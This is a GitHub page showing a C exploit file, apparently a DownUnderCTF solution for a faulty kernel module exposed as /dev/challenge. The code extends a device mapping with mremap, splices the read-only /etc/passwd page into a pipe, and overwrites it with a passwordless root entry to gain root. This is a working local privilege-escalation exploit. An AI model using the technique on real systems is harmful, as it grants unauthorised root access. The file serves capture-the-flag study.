-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdownunderCTF_faulty_kernel_exploit.c
111 lines (91 loc) · 2.7 KB
/
downunderCTF_faulty_kernel_exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define module "/dev/challenge"
#define PAGE_SZ 0x1000
#define PAGE_CNT 0x80
int pipes[2];
int fd, passwd_fd;
void fatal(char* msg){
perror(msg);
exit(-1);
}
void check_fd(int fd){
if (fd < 0) fatal("Error During FD Opening\n");
}
void breakpoint(){
printf("CHECK GDB ");
fflush(stdout);
getchar();
printf("\n");
}
void inspect_memory(void *addr, size_t length) {
int mem_fd = open("/proc/self/mem", O_RDONLY);
if (mem_fd < 0) {
perror("open /proc/self/mem");
return;
}
if (lseek(mem_fd, (off_t)addr, SEEK_SET) == (off_t)-1) {
perror("lseek");
close(mem_fd);
return;
}
char buffer[128];
ssize_t bytes = read(mem_fd, buffer, length);
if (bytes > 0) {
printf("Memory at %p:\n", addr);
for (size_t i = 0; i < bytes; i++) {
printf("%02x ", (unsigned char)buffer[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
printf("\n");
} else {
perror("read");
}
close(mem_fd);
}
void dump_memory(void *address, size_t size) {
unsigned char *addr = (unsigned char *)address;
printf("Memory dump at %p:\n", address);
for (size_t i = 0; i < size; i++) {
printf("%02x ", addr[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
printf("\n");
}
int main(){
char ovw[] = "root::0:0:xroot:/root:/bin/sh\0";
passwd_fd = open("/etc/passwd", O_RDONLY);
check_fd(passwd_fd);
printf("Opened /etc/passwd\n");
void *pass_map = mmap(NULL, PAGE_SZ, PROT_READ, MAP_SHARED, passwd_fd, 0);
printf("/etc/passwd mapped at address: \t\t%p\n", pass_map);
fd = open(module, O_RDWR);
check_fd(fd);
printf("Opened /dev/challenge\n");
void *ptr = mmap(0, PAGE_CNT * PAGE_SZ, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
printf("/dev/challenge mapped at address: \t%p\n", ptr);
ptr = mremap(ptr, PAGE_CNT * PAGE_SZ, PAGE_SZ * PAGE_CNT + 1, MREMAP_MAYMOVE);
printf("mremap successful. New address: \t%p\n", ptr);
pipe(pipes);
printf("Pipe created. Read end: %d, Write end: %d\n", pipes[0], pipes[1]);
struct iovec iov = {
.iov_base = pass_map,
.iov_len = PAGE_SZ,
};
vmsplice(pipes[1], &iov, 1, 0);
printf("\n--- Dumping /etc/passwd memory region ---\n");
dump_memory(pass_map, 64);
void *target_address = (char *)(ptr + PAGE_CNT * PAGE_SZ);
inspect_memory(target_address, 64);
printf("Address to be overwritten: \t%p\n", target_address);
strcpy(target_address, ovw);
printf("\n--- Dumping /etc/passwd memory region after overwrite ---\n");
dump_memory(target_address, 64);
return 0;
}